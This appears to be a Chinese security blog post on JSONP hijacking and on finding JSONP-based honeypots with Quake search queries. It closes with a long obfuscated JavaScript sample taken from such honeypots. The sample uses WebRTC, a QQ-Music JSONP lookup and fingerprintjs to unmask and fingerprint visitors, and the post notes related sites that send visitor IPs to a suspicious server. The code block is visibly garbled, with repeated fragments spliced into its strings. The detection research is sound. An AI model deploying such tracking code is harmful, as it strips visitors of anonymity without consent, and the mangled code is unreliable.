对全网上一些JSONP蜜罐探索与识别

jsonp是为了解决什么问题

在互联网通信过程中，ajax请求受同源策略影响，不允许进行跨域请求，而script标签src属性中的链接却可以访问跨域的js脚本，利用这个特性，服务端不再返回JSON格式的数据，而是返回一段调用某个函数的js代码，在src中进行了调用，这样实现了跨域。

当html源码里，插入带有跨域url的script标签，然后调用回调函数，把我们需要的json数据作为参数传入，通过一些逻辑把数据显示在页面上。

比如如下代码所示，通过script标签完成http://localhost:8080/test01/dom01?callback=jsontest的调用。

后端代码：

访问test.html页面执行script，请求http://localhost:8080/test01/dom01?callback=jsontest，然后将请求的内容作为参数，执行jsontest函数，jsontest函数将请求的内容弹出来出来。结果如下：

这样我们就通过script标签实现了跨域请求，绕过了同源策略。

同样我们可以通过在frame里面通过创建一个临时的script标签来实现跨域请求。

jsonp漏洞有啥危害

JSON劫持又称“JSON Hijacking”，2008年国外安全研究人员开始提到由JSONP带来的风险。这个问题属于CSRF（Cross-site request forgery跨站请求伪造）攻击范畴，当某网站通过JSONP的方式跨域（一般为子域）传递用户认证后的敏感信息时，攻击者可以构造恶意的JSONP调用页面，诱导被攻击者访问，以达到截取用户敏感信息的目的。如图所示(来自参考文章)

jsonp劫持与csrf漏洞利用上有很多相似之处和不同之处。

1、对方需要主动或者间接访问到攻击者的URL，但是不同之处在于，csrf可以不止script标签来利用，还可以利用img等加载外部资源的标签，而jsonp劫持目前只能通过script标签来引入js代码调用。

2、在修复方式上很类似，只需要严格验证referer，基本上能解决90%的漏洞修复。

3、都需要已登录或者已注册攻击网站，或者说cookie当时未失效。

4、jsonp劫持主要是获取到了网站用户的敏感信息，csrf漏洞主要是利用用户权限进行了敏感操作。

jsonp漏洞的利用前提（防御方法）

限制来源referer 按照JSON格式标准输出（设置Content-Type : application/json; charset=utf-8），预防http://127.0.0.1/getUsers.php?callback=形式的xss

如何在quake上搜索存在jsonp的链接，从而定位到蜜罐。

1、根据上文可知，大部分的jsonp都是通过加载script的方式进行引入url，所以，我们可以通过quake的特殊搜索关键词:link_script_url来进行搜索。

因为jsonp劫持需要指定回调函数，而回调函数往往与callback,jsonp等单词有关，因此我们可以先利用这些关键单词进行粗略搜索。

quake通过link_script_url:"jsonp"，打开 排除蜜罐 和 数据去重 开关。查看页面JSONP的地方，发现一个ip引入的script有点有趣。

通过直觉，觉得这个url是可以获取到当前IP的。https://api.ipify.org?format=jsonp&callback=getIP

笔者发现，其实可以通过这类第三方网站的，获取到ip定位的，其实也是个不错的jsonp蜜罐选择。于是，结合前面的搜索语法，

link_script_url:"callback" AND link_script_url:"getIP"

发现近一年当中还是有近5千个独立ip会存在获取访问者当前ip的行为。、

当观察到第三个ip的html源代码的时候，发现一个比较有趣的代码。

通过js代码，该网站会把ip信息发送给107.172.22.132:8081/ngnix/jregs.html?idC/+ip，根据微步在线查询107.172.22.132，该ip有一定的恶意行为。

在认为此方法有可能是某种蜜罐的行为后，笔者打算再加上一个约束词来进行精确搜索。因为是使用windows.open的。所以搜索关键词改为：

link_script_url:"callback" AND link_script_url:"getIP" AND body:"window.open" AND body: "jregs.html"，找到43个ip。通过这43个ip发现此类网站均无favicon,无title，且js源码大致一致。

2、根据开源蜜罐使用的jsonp漏洞列表搜

在做研究的时候，我们发现了某个蜜罐所使用的jsonp漏洞列表的项目，我们逐个搜索发现有个使用qq music的jsonp链接，发现有类蜜罐对此采用了混淆，压缩的方法和假冒网站的做法。

搜索关键词如下：

response:"mozRTCPeerConnection" AND country: "China" AND NOT favicon: "06528cc6cc68ca93264a7ca4f6fcc900"

<script>
  var _0x5ee3=['YXBwZW5kQ2hpbGQ=','RWxWWXE=','cHNBSHg=','dGVzdA==','bHlweGQ=','aWNlU2VydmVycw==','V2luZG93cyBOVCA2LjM=','Y3pvZ2M=','b0tBa1g=','bnRCUGU=','Y3JlYXRlRGF0YUNoYW5uZWw=','Q0thZWY=','UlBKemY=','RXJrcG0=','bXdHdUM=','d3RMamw=','XihbXiBdKyggK1teIF0rKSspK1teIF19','V0pka0I=','eDY0','bG9jYXRpb24=','ZERkVlI=','bFZwS3I=','bkhYWFM=','Sk1YTnQ=','Y3JlYXRlRWxlbWVudA==','V2luMjAwMw==','TnJEY0s=','Yk9VaG8=','ZVZiUEg=','aXZhT0k=','Z0xuVGM=','Z0RwdGY=','d2dEeWc=','dG9Mb3dlckNhc2U=','V2luMTA=','TFpIamY=','TFZrVEo=','VFhFa3k=','ZGpiWVY=','SXBXS1o=','UXFmQ2w=','eWx3UkM=','cmV0dXJuIC8iICsgdGhpcyArICIv','dURzQWU=','cmxXVlo=','V2luZG93cyAyMDAz','ZW5jcnlwdF91aW4=','c2FmYXJp','V2luZG93cyA4','UE9TVA==','YVhCYm0=','VmFOQm4=','dHVxZ0U=','RldTd2w=','dXJs','d1V2cmg=','c3Jj','Y3JlYXRlT2ZmZXI=','aW5mbw==','Y2FuZGlkYXRl','ZGF0YQ==','YXZmemc=','WFFlWXY=','YW5kcm9pZA==','dmlzaXRvcklk','VmNuT1c=','ZmlyZWZveA==','ZGVidWc=','V1RBT24=','V2luZG93cyAyMDAw','V2luZG93cw==','V2luNw==','c1hwV0s=','clhyTVo=','Y29uc29sZQ==','T01Xa0U=','RFV4UHY=','bG9n','dkJ1RFQ=','bnZiWnQ=','bkVUWUQ=','YnZJY1c=','a1FKQ3I=','aGZtYUo=','U2hYblo=','R1ZVYVQ=','cmVhbGlw','WG9RdGM=','cmFua2luZm8=','SmxZaGE=','SUtkZWw=','eWhvZUY=','V2luZG93cyBOVCA1LjE=','YnVsUWI=','ZXhjZXB0aW9u','UWt3alg=','cURDa1U=','VW5peA==','Y0h4aHc=','anNvbg==','VWVhUHI=','dGV4dA==','YXBwbHk=','VlZ0SWU=','aGJpV3U=','V2JaWE8=','c3BsaXQ=','Q2NrU2M=','c0ppQ0k=','VFRQdFo=','aGVhZA==','R2N5Rlk=','bHdzeGk=','dHJhY2U=','cEVBTm4=','UlRDUGVlckNvbm5lY3Rpb24=','cGxhdGZvcm0=','TWFjaW50b3No','cHJscHI=','RmJNTEg=','TWFjSW50ZWw=','V2luZG93cyBYUA==','cW11YlA=','bXNpZQ==','V09XNjQ=','ZGF0YVR5cGU=','c3ZJd3M=','YmluZA==','dG9TdHJpbmc=','b25lcnJvcg==','ZXJyb3I=','U0hibFA=','cmV0dXJuIChmdW5jdGlvbigpIA==','Y29uc3RydWN0b3I=','V2luZG93cyBOVCA1LjA=','dkZkcEo=','SHROYlY=','SXNIdkU=','RHZZcmY=','V2luWFA=','dWpVVnM=','ZEtUQXE=','Y29tcGlsZQ==','bWF0Y2g=','Y0FSZ0o=','S3NRUkg=','NXw2fDF8NHwzfDh8MHw3fDI=','WlJaVGM=','V2luNjQ=','ZXFhRFc=','Vm9kTXE=','SUFZQkE=','aHR0cHM6Ly93d3cuY2xvdWRmbGFyZS5jb20vY2RuLWNnaS90cmFjZQ==','Z3FMRko=','YmhVeWg=','d2Fybg==','Z2V0','V2luVmlzdGE=','aU1QWFE=','Y2hyb21l','MXwwfDJ8M3w1fDQ=','emVOaE8=','aHR0cHM6Ly9jZG4uanNkZWxpdnIubmV0L25wbS8=','OXwxNHwxM3wyfDB8MTB8NXwxMXw0fDZ8MTJ8N3wzfDh8MQ==','WWd1Vms=','WkpUdUU=','bVRnSG0=','Y2RTV2w=','UVNTWlE=','d3Z0VG4=','YWpheA==','T0tBdko=','U2VxTnA=','UVEtTXVzaWM=','WVlCQ28=','b25sb2Fk','ZXhlYw==','Q0JuaEI=','UkVieXI=','cGFuVXA=','WnhWSG4=','c01IVnQ=','aHdVVVo=','Tk9xaVY=','ekFMQ1Q=','TlBpd0U=','SmZ6dWc=','dlFYZGw=','SlFXYlg=','SEx1VHE=','dFdCdlM=','TGludXg=','YXBwbGljYXRpb24vanNvbjsgY2hhcnNldD11dGYtOA==','Wm5UUlc=','SFN6UEw=','cHZFYlQ=','dGhlbg==','WEhsRHo=','e30uY29uc3RydWN0b3IoInJldHVybiB0aGlzIikoICk=','YndxR3Q=','anBxeU0=','Y0xKSGw=','ZVNTYlI=','dkp2b0U=','dGFibGU=','c253RlU=','THd6V2M=','V2luZG93cyBOVCA1LjI=','YXlXSlc=','b25pY2VjYW5kaWRhdGU=','b3NnV1A=','V2luMzI=','SkhiZ2I=','V2luZG93cyBWaXN0YQ==','QGZpbmdlcnByaW50anMvZmluZ2VycHJpbnRqc0AzL2Rpc3QvZnAubWluLmpz','Y29udGVudFR5cGU=','QW5kcm9pZA==','WlNLd04=','dXNlckFnZW50','N3w5fDZ8NHwwfDN8Mnw4fDF8NQ==','WUZKU2Q=','S2hhWnc=','dmFkUEc=','aW5kZXhPZg==','TnBXcHE=','ZnhZQng=','U3JhaEY=','c2NyaXB0','eGpnQ1U=','alhNU0g=','dHlwZQ==','SlZycVY=','TWFjNjhL','QmFEYkc=','Q0hsVkU='];(function(_0x1c69ca,_0x5ee3fe){var _0xebe51e=function(_0x55f254){while(--_0x55f254){_0x1c69ca['push'](_0x1c69ca['shift']( "'YXBwZW5kQ2hpbGQ=','RWxWWXE=','cHNBSHg=','dGVzdA==','bHlweGQ=','aWNlU2VydmVycw==','V2luZG93cyBOVCA2LjM=','Y3pvZ2M=','b0tBa1g=','bnRCUGU=','Y3JlYXRlRGF0YUNoYW5uZWw=','Q0thZWY=','UlBKemY=','RXJrcG0=','bXdHdUM=','d3RMamw=','XihbXiBdKyggK1teIF0rKSspK1teIF19','V0pka0I=','eDY0','bG9jYXRpb24=','ZERkVlI=','bFZwS3I=','bkhYWFM=','Sk1YTnQ=','Y3JlYXRlRWxlbWVudA==','V2luMjAwMw==','TnJEY0s=','Yk9VaG8=','ZVZiUEg=','aXZhT0k=','Z0xuVGM=','Z0RwdGY=','d2dEeWc=','dG9Mb3dlckNhc2U=','V2luMTA=','TFpIamY=','TFZrVEo=','VFhFa3k=','ZGpiWVY=','SXBXS1o=','UXFmQ2w=','eWx3UkM=','cmV0dXJuIC8iICsgdGhpcyArICIv','dURzQWU=','cmxXVlo=','V2luZG93cyAyMDAz','ZW5jcnlwdF91aW4=','c2FmYXJp','V2luZG93cyA4','UE9TVA==','YVhCYm0=','VmFOQm4=','dHVxZ0U=','RldTd2w=','dXJs','d1V2cmg=','c3Jj','Y3JlYXRlT2ZmZXI=','aW5mbw==','Y2FuZGlkYXRl','ZGF0YQ==','YXZmemc=','WFFlWXY=','YW5kcm9pZA==','dmlzaXRvcklk','VmNuT1c=','ZmlyZWZveA==','ZGVidWc=','V1RBT24=','V2luZG93cyAyMDAw','V2luZG93cw==','V2luNw==','c1hwV0s=','clhyTVo=','Y29uc29sZQ==','T01Xa0U=','RFV4UHY=','bG9n','dkJ1RFQ=','bnZiWnQ=','bkVUWUQ=','YnZJY1c=','a1FKQ3I=','aGZtYUo=','U2hYblo=','R1ZVYVQ=','cmVhbGlw','WG9RdGM=','cmFua2luZm8=','SmxZaGE=','SUtkZWw=','eWhvZUY=','V2luZG93cyBOVCA1LjE=','YnVsUWI=','ZXhjZXB0aW9u','UWt3alg=','cURDa1U=','VW5peA==','Y0h4aHc=','anNvbg==','VWVhUHI=','dGV4dA==','YXBwbHk=','VlZ0SWU=','aGJpV3U=','V2JaWE8=','c3BsaXQ=','Q2NrU2M=','c0ppQ0k=','VFRQdFo=','aGVhZA==','R2N5Rlk=','bHdzeGk=','dHJhY2U=','cEVBTm4=','UlRDUGVlckNvbm5lY3Rpb24=','cGxhdGZvcm0=','TWFjaW50b3No','cHJscHI=','RmJNTEg=','TWFjSW50ZWw=','V2luZG93cyBYUA==','cW11YlA=','bXNpZQ==','V09XNjQ=','ZGF0YVR5cGU=','c3ZJd3M=','YmluZA==','dG9TdHJpbmc=','b25lcnJvcg==','ZXJyb3I=','U0hibFA=','cmV0dXJuIChmdW5jdGlvbigpIA==','Y29uc3RydWN0b3I=','V2luZG93cyBOVCA1LjA=','dkZkcEo=','SHROYlY=','SXNIdkU=','RHZZcmY=','V2luWFA=','dWpVVnM=','ZEtUQXE=','Y29tcGlsZQ==','bWF0Y2g=','Y0FSZ0o=','S3NRUkg=','NXw2fDF8NHwzfDh8MHw3fDI=','WlJaVGM=','V2luNjQ=','ZXFhRFc=','Vm9kTXE=','SUFZQkE=','aHR0cHM6Ly93d3cuY2xvdWRmbGFyZS5jb20vY2RuLWNnaS90cmFjZQ==','Z3FMRko=','YmhVeWg=','d2Fybg==','Z2V0','V2luVmlzdGE=','aU1QWFE=','Y2hyb21l','MXwwfDJ8M3w1fDQ=','emVOaE8=','aHR0cHM6Ly9jZG4uanNkZWxpdnIubmV0L25wbS8=','OXwxNHwxM3wyfDB8MTB8NXwxMXw0fDZ8MTJ8N3wzfDh8MQ==','WWd1Vms=','WkpUdUU=','bVRnSG0=','Y2RTV2w=','UVNTWlE=','d3Z0VG4=','YWpheA==','T0tBdko=','U2VxTnA=','UVEtTXVzaWM=','WVlCQ28=','b25sb2Fk','ZXhlYw==','Q0JuaEI=','UkVieXI=','cGFuVXA=','WnhWSG4=','c01IVnQ=','aHdVVVo=','Tk9xaVY=','ekFMQ1Q=','TlBpd0U=','SmZ6dWc=','dlFYZGw=','SlFXYlg=','SEx1VHE=','dFdCdlM=','TGludXg=','YXBwbGljYXRpb24vanNvbjsgY2hhcnNldD11dGYtOA==','Wm5UUlc=','SFN6UEw=','cHZFYlQ=','dGhlbg==','WEhsRHo=','e30uY29uc3RydWN0b3IoInJldHVybiB0aGlzIikoICk=','YndxR3Q=','anBxeU0=','Y0xKSGw=','ZVNTYlI=','dkp2b0U=','dGFibGU=','c253RlU=','THd6V2M=','V2luZG93cyBOVCA1LjI=','YXlXSlc=','b25pY2VjYW5kaWRhdGU=','b3NnV1A=','V2luMzI=','SkhiZ2I=','V2luZG93cyBWaXN0YQ==','QGZpbmdlcnByaW50anMvZmluZ2VycHJpbnRqc0AzL2Rpc3QvZnAubWluLmpz','Y29udGVudFR5cGU=','QW5kcm9pZA==','WlNLd04=','dXNlckFnZW50','N3w5fDZ8NHwwfDN8Mnw4fDF8NQ==','WUZKU2Q=','S2hhWnc=','dmFkUEc=','aW5kZXhPZg==','TnBXcHE=','ZnhZQng=','U3JhaEY=','c2NyaXB0','eGpnQ1U=','alhNU0g=','dHlwZQ==','SlZycVY=','TWFjNjhL','QmFEYkc=','Q0hsVkU='];(function(_0x1c69ca,_0x5ee3fe){var _0xebe51e=function(_0x55f254){while(--_0x55f254){_0x1c69ca['push'"));}};var _0x558c4e=function(){var _0x2101f3={'data':{'key':'cookie','value':'timeout'},'setCookie':function(_0x143841,_0x421f34,_0x15d8a2,_0x2399f7){_0x2399f7=_0x2399f7||{};var _0x584ee6=_0x421f34+'='+_0x15d8a2;var _0x51c1c5=0x0;for(var _0x45d15f=0x0,_0x3718fc=_0x143841['length'];_0x45d15f<_0x3718fc;_0x45d15f++){var _0x30cb00=_0x143841[_0x45d15f];_0x584ee6+=';x20'+_0x30cb00;var _0x1df9e6=_0x143841[_0x30cb00];_0x143841['push'](_0x1df9e6 "'length'];_0x45d15f<_0x3718fc;_0x45d15f++){var _0x30cb00=_0x143841[_0x45d15f];_0x584ee6+=';x20'+_0x30cb00;var _0x1df9e6=_0x143841[_0x30cb00];_0x143841['push'");_0x3718fc=_0x143841['length'];if(_0x1df9e6!==!![]){_0x584ee6+='='+_0x1df9e6;}}_0x2399f7['cookie']=_0x584ee6;},'removeCookie':function(){return'dev';},'getCookie':function(_0x5b6862,_0x2475d2){_0x5b6862=_0x5b6862||function(_0x36f3cf){return _0x36f3cf;};var _0x5d236d=_0x5b6862(new RegExp('(?:^|;x20)'+_0x2475d2['replace'](/([.$?*|{}( "'length'];if(_0x1df9e6!==!![]){_0x584ee6+='='+_0x1df9e6;}}_0x2399f7['cookie']=_0x584ee6;},'removeCookie':function(){return'dev';},'getCookie':function(_0x5b6862,_0x2475d2){_0x5b6862=_0x5b6862||function(_0x36f3cf){return _0x36f3cf;};var _0x5d236d=_0x5b6862(new RegExp('(?:^|;x20)'+_0x2475d2['replace'")[]/+^])/g,'$1')+'=([^;]*)'));var _0x513215=function(_0x4abe60,_0x2301b8){_0x4abe60(++_0x2301b8);};_0x513215(_0xebe51e,_0x5ee3fe);return _0x5d236d?decodeURIComponent(_0x5d236d[0x1]):undefined;}};var _0x537218=function(){var _0x36eed8=new RegExp('x5cw+x20*x5c(x5c)x20*{x5cw+x20*[x27|x22].+[x27|x22];?x20*}');return _0x36eed8['test'](_0x2101f3['removeCookie']['toString']( "]/+^])/g,'$1')+'=([^;]*)'));var _0x513215=function(_0x4abe60,_0x2301b8){_0x4abe60(++_0x2301b8);};_0x513215(_0xebe51e,_0x5ee3fe);return _0x5d236d?decodeURIComponent(_0x5d236d[0x1]):undefined;}};var _0x537218=function(){var _0x36eed8=new RegExp('x5cw+x20*x5c(x5c)x20*{x5cw+x20*[x27|x22].+[x27|x22];?x20*}');return _0x36eed8['test'"));};_0x2101f3['updateCookie']=_0x537218;var _0x207d9b='';var _0x47a1e1=_0x2101f3['updateCookie']( "'updateCookie']=_0x537218;var _0x207d9b='';var _0x47a1e1=_0x2101f3['updateCookie'");if(!_0x47a1e1){_0x2101f3['setCookie'](['*'],'counter',0x1 "'setCookie'");}else if(_0x47a1e1){_0x207d9b=_0x2101f3['getCookie'](null,'counter' "'getCookie'");}else{_0x2101f3['removeCookie']( "'removeCookie'");}};_0x558c4e();}(_0x5ee3,0x6b));var _0xebe5=function(_0x1c69ca,_0x5ee3fe){_0x1c69ca=_0x1c69ca-0x0;var _0xebe51e=_0x5ee3[_0x1c69ca];if(_0xebe5['PHWAzy']===undefined){(function(){var _0x55f254=function(){var _0x207d9b;try{_0x207d9b=Function('returnx20(function()x20'+'{}.constructor(x22returnx20thisx22)(x20)'+');')();}catch(_0x47a1e1){_0x207d9b=window;}return _0x207d9b;};var _0x2101f3=_0x55f254();var _0x537218='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x2101f3['atob']||(_0x2101f3['atob']=function(_0x143841){var _0x421f34=String(_0x143841)['replace'](/=+$/,'' "_0x1c69ca];if(_0xebe5['PHWAzy']===undefined){(function(){var _0x55f254=function(){var _0x207d9b;try{_0x207d9b=Function('returnx20(function()x20'+'{}.constructor(x22returnx20thisx22)(x20)'+');')();}catch(_0x47a1e1){_0x207d9b=window;}return _0x207d9b;};var _0x2101f3=_0x55f254();var _0x537218='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x2101f3['atob']||(_0x2101f3['atob']=function(_0x143841){var _0x421f34=String(_0x143841)['replace'");var _0x15d8a2='';for(var _0x2399f7=0x0,_0x584ee6,_0x51c1c5,_0x45d15f=0x0;_0x51c1c5=_0x421f34['charAt'](_0x45d15f++ "'charAt'");~_0x51c1c5&&(_0x584ee6=_0x2399f7%0x4?_0x584ee6*0x40+_0x51c1c5:_0x51c1c5,_0x2399f7++%0x4)?_0x15d8a2+=String['fromCharCode'](0xff&_0x584ee6>>(-0x2*_0x2399f7&0x6 "'fromCharCode'")):0x0){_0x51c1c5=_0x537218['indexOf'](_0x51c1c5 "'indexOf'");}return _0x15d8a2;});}());_0xebe5['rwIpEC']=function(_0x3718fc){var _0x30cb00=atob(_0x3718fc);var _0x1df9e6=[];for(var _0x5b6862=0x0,_0x2475d2=_0x30cb00['length'];_0x5b6862<_0x2475d2;_0x5b6862++){_0x1df9e6+='%'+('00'+_0x30cb00['charCodeAt'](_0x5b6862 "'rwIpEC']=function(_0x3718fc){var _0x30cb00=atob(_0x3718fc);var _0x1df9e6=[];for(var _0x5b6862=0x0,_0x2475d2=_0x30cb00['length'];_0x5b6862<_0x2475d2;_0x5b6862++){_0x1df9e6+='%'+('00'+_0x30cb00['charCodeAt'")['toString'](0x10 "'toString'"))['slice'](-0x2 "'slice'");}return decodeURIComponent(_0x1df9e6);};_0xebe5['ALeZhS']={};_0xebe5['PHWAzy']=!![];}var _0x558c4e=_0xebe5['ALeZhS'][_0x1c69ca];if(_0x558c4e===undefined){var _0x5d236d=function(_0x513215){this['YHXXZU']=_0x513215;this['uOUXGR']=[0x1,0x0,0x0];this['QKySZB']=function(){return'newState';};this['hLpTdv']='x5cw+x20*x5c(x5c)x20*{x5cw+x20*';this['fPJsBU']='[x27|x22].+[x27|x22];?x20*}';};_0x5d236d['prototype']['pcFwxO']=function(){var _0x36f3cf=new RegExp(this['hLpTdv']+this['fPJsBU']);var _0x4abe60=_0x36f3cf['test'](this['QKySZB']['toString']( "'ALeZhS']={};_0xebe5['PHWAzy']=!![];}var _0x558c4e=_0xebe5['ALeZhS'][_0x1c69ca];if(_0x558c4e===undefined){var _0x5d236d=function(_0x513215){this['YHXXZU']=_0x513215;this['uOUXGR']=[0x1,0x0,0x0];this['QKySZB']=function(){return'newState';};this['hLpTdv']='x5cw+x20*x5c(x5c)x20*{x5cw+x20*';this['fPJsBU']='[x27|x22].+[x27|x22];?x20*}';};_0x5d236d['prototype']['pcFwxO']=function(){var _0x36f3cf=new RegExp(this['hLpTdv']+this['fPJsBU']);var _0x4abe60=_0x36f3cf['test'"))?--this['uOUXGR'][0x1]:--this['uOUXGR'][0x0];return this['jXjArP'](_0x4abe60 "'uOUXGR'][0x1]:--this['uOUXGR'][0x0];return this['jXjArP'");};_0x5d236d['prototype']['jXjArP']=function(_0x2301b8){if(!Boolean(~_0x2301b8)){return _0x2301b8;}return this['HCDfAG'](this['YHXXZU'] "'prototype']['jXjArP']=function(_0x2301b8){if(!Boolean(~_0x2301b8)){return _0x2301b8;}return this['HCDfAG'");};_0x5d236d['prototype']['HCDfAG']=function(_0x36eed8){for(var _0x4c8374=0x0,_0x5bbbdd=this['uOUXGR']['length'];_0x4c8374<_0x5bbbdd;_0x4c8374++){this['uOUXGR']['push'](Math['round'](Math['random']( "'prototype']['HCDfAG']=function(_0x36eed8){for(var _0x4c8374=0x0,_0x5bbbdd=this['uOUXGR']['length'];_0x4c8374<_0x5bbbdd;_0x4c8374++){this['uOUXGR']['push'")));_0x5bbbdd=this['uOUXGR']['length'];}return _0x36eed8(this['uOUXGR'][0x0]);};new _0x5d236d(_0xebe5)['pcFwxO']( "'uOUXGR']['length'];}return _0x36eed8(this['uOUXGR'][0x0]);};new _0x5d236d(_0xebe5)['pcFwxO'");_0xebe51e=_0xebe5['rwIpEC'](_0xebe51e "'rwIpEC'");_0xebe5['ALeZhS'][_0x1c69ca]=_0xebe51e;}else{_0xebe51e=_0x558c4e;}return _0xebe51e;};var _0x143841=function(){var _0x102218={};_0x102218[_0xebe5('0x82')]=function(_0x4063f4,_0x4c19f7){return _0x4063f4!==_0x4c19f7;};_0x102218['KsQRH']=_0xebe5('0x91');_0x102218[_0xebe5('0x57')]=_0xebe5('0x7c');_0x102218[_0xebe5('0xa5')]=function(_0x2ae694,_0x249108){return _0x2ae694===_0x249108;};_0x102218[_0xebe5('0xce')]=_0xebe5('0xbe');var _0x21dc92=_0x102218;var _0x5ba68e=!![];return function(_0x529cd9,_0x4146d9){var _0xe7c28e={};_0xe7c28e[_0xebe5('0xcb')]=_0xebe5('0x6b');_0xe7c28e[_0xebe5('0x5a')]=function(_0x5b81e7,_0x2f8bdc){return _0x21dc92['psAHx'](_0x5b81e7,_0x2f8bdc "'ALeZhS'][_0x1c69ca]=_0xebe51e;}else{_0xebe51e=_0x558c4e;}return _0xebe51e;};var _0x143841=function(){var _0x102218={};_0x102218[_0xebe5('0x82')]=function(_0x4063f4,_0x4c19f7){return _0x4063f4!==_0x4c19f7;};_0x102218['KsQRH']=_0xebe5('0x91');_0x102218[_0xebe5('0x57')]=_0xebe5('0x7c');_0x102218[_0xebe5('0xa5')]=function(_0x2ae694,_0x249108){return _0x2ae694===_0x249108;};_0x102218[_0xebe5('0xce')]=_0xebe5('0xbe');var _0x21dc92=_0x102218;var _0x5ba68e=!![];return function(_0x529cd9,_0x4146d9){var _0xe7c28e={};_0xe7c28e[_0xebe5('0xcb')]=_0xebe5('0x6b');_0xe7c28e[_0xebe5('0x5a')]=function(_0x5b81e7,_0x2f8bdc){return _0x21dc92['psAHx'");};_0xe7c28e['uNJDg']=_0x21dc92[_0xebe5('0x26')];_0xe7c28e[_0xebe5('0x6e')]=_0x21dc92['HSzPL'];_0xe7c28e[_0xebe5('0xd0')]=function(_0x393d8c,_0xb7cf29){return _0x21dc92[_0xebe5('0xa5')](_0x393d8c,_0xb7cf29 "'uNJDg']=_0x21dc92[_0xebe5('0x26')];_0xe7c28e[_0xebe5('0x6e')]=_0x21dc92['HSzPL'];_0xe7c28e[_0xebe5('0xd0')]=function(_0x393d8c,_0xb7cf29){return _0x21dc92[_0xebe5('0xa5')");};_0xe7c28e[_0xebe5('0x60')]=_0x21dc92['vBuDT'];var _0x744009=_0xe7c28e;var _0x41fcb0=_0x5ba68e?function(){var _0x476ddf={};_0x476ddf[_0xebe5('0x8e')]=_0xebe5('0x37');_0x476ddf[_0xebe5('0xa6')]=_0x744009[_0xebe5('0xcb')];var _0xacef7c=_0x476ddf;if(_0x744009['XHlDz'](_0x744009['uNJDg'],_0x744009['ZSKwN'] "_0xebe5('0x60')]=_0x21dc92['vBuDT'];var _0x744009=_0xe7c28e;var _0x41fcb0=_0x5ba68e?function(){var _0x476ddf={};_0x476ddf[_0xebe5('0x8e')]=_0xebe5('0x37');_0x476ddf[_0xebe5('0xa6')]=_0x744009[_0xebe5('0xcb')];var _0xacef7c=_0x476ddf;if(_0x744009['XHlDz'")){if(_0x4146d9){if(_0x744009[_0xebe5('0xd0')](_0x744009[_0xebe5('0x60' "_0xebe5('0xd0')")],_0xebe5('0xf'))){var _0x5f159f=_0xebe5('0x35')[_0xebe5('0xea')]('|' "_0xebe5('0xea')");var _0xe765fa=0x0;while(!![]){switch(_0x5f159f[_0xe765fa++]){case'0':_0x240792[_0xebe5('0x44')]=resolve;continue;case'1':var _0x240792=document[_0xebe5('0x98')](_0xebe5('0x78'));continue;case'2':_0x240792[_0xebe5('0x16')]=reject;continue;case'3':_0x240792['async']=!![];continue;case'4':document[_0xebe5('0x3')][_0xebe5('0x80')](_0x240792 "_0xebe5('0x16')]=reject;continue;case'3':_0x240792['async']=!![];continue;case'4':document[_0xebe5('0x3')][_0xebe5('0x80')");continue;case'5':_0x240792[_0xebe5('0xb8')]=_0xacef7c[_0xebe5('0x8e')]+_0xacef7c[_0xebe5('0xa6')];continue;}break;}}else{var _0x305912=_0x4146d9[_0xebe5('0xe6')](_0x529cd9,arguments "_0xebe5('0xb8')]=_0xacef7c[_0xebe5('0x8e')]+_0xacef7c[_0xebe5('0xa6')];continue;}break;}}else{var _0x305912=_0x4146d9[_0xebe5('0xe6')");_0x4146d9=null;return _0x305912;}}}else{return'x86';}}:function(){};_0x5ba68e=![];return _0x41fcb0;};}();var _0x47a1e1=_0x143841(this,function(){var _0x3cc50e={};_0x3cc50e['dDdVR']='^([^x20]+(x20+[^x20]+)+)+[^x20]}';_0x3cc50e[_0xebe5('0x7f')]=function(_0x723a99){return _0x723a99();};var _0x190480=_0x3cc50e;var _0x140de6=function(){var _0x432e1e=_0x140de6[_0xebe5('0x1a')](_0xebe5('0xaa'))()[_0xebe5('0x23')](_0x190480[_0xebe5('0x94' "_0xebe5('0x23')")]);return!_0x432e1e['test'](_0x47a1e1 "'test'");};return _0x190480['CHlVE'](_0x140de6 "'CHlVE'");});_0x47a1e1();var _0x2101f3=function(){var _0x4c207e={};_0x4c207e['JVdpp']=function(_0x56b030,_0xa13cfd){return _0x56b030!==_0xa13cfd;};_0x4c207e[_0xebe5('0xe8')]=_0xebe5('0xa0');var _0x2684e0=_0x4c207e;var _0x3c44e7=!![];return function(_0x1afbf1,_0x10f3be){var _0x4ffb98=_0x3c44e7?function(){if(_0x10f3be){if(_0x2684e0['JVdpp'](_0x2684e0['hbiWu'],_0x2684e0[_0xebe5('0xe8' "'JVdpp']=function(_0x56b030,_0xa13cfd){return _0x56b030!==_0xa13cfd;};_0x4c207e[_0xebe5('0xe8')]=_0xebe5('0xa0');var _0x2684e0=_0x4c207e;var _0x3c44e7=!![];return function(_0x1afbf1,_0x10f3be){var _0x4ffb98=_0x3c44e7?function(){if(_0x10f3be){if(_0x2684e0['JVdpp'")])){return''+agent[_0xebe5('0x24')](regStr_saf "_0xebe5('0x24')");}else{var _0x4f5763=_0x10f3be[_0xebe5('0xe6')](_0x1afbf1,arguments "_0xebe5('0xe6')");_0x10f3be=null;return _0x4f5763;}}}:function(){};_0x3c44e7=![];return _0x4ffb98;};}();var _0x55f254=_0x2101f3(this,function(){var _0x872d71={};_0x872d71['LVkTJ']=_0xebe5('0xaa');_0x872d71[_0xebe5('0x58')]=_0xebe5('0x90');_0x872d71[_0xebe5('0xd2')]=_0xebe5('0x70');_0x872d71[_0xebe5('0xb7')]=_0xebe5('0x92');_0x872d71[_0xebe5('0x13')]=function(_0x42fcb3,_0x4e3c0c){return _0x42fcb3===_0x4e3c0c;};_0x872d71['eqaDW']=_0xebe5('0x87');_0x872d71[_0xebe5('0xa9')]=function(_0x15183c,_0x57564a){return _0x15183c+_0x57564a;};_0x872d71[_0xebe5('0x43')]=_0xebe5('0x19');_0x872d71[_0xebe5('0x2')]=function(_0x2d87d4){return _0x2d87d4();};_0x872d71['HtNbV']=function(_0x40c128,_0x38f305){return _0x40c128===_0x38f305;};_0x872d71[_0xebe5('0x5f')]=_0xebe5('0x5e');var _0x213107=_0x872d71;var _0x2f86f9=function(){};var _0x34f22b;try{if(_0x213107[_0xebe5('0x13')](_0x213107['eqaDW'],_0x213107[_0xebe5('0x2a')])){var _0x3e6336=Function(_0x213107[_0xebe5('0xa9')](_0x213107[_0xebe5('0x43' 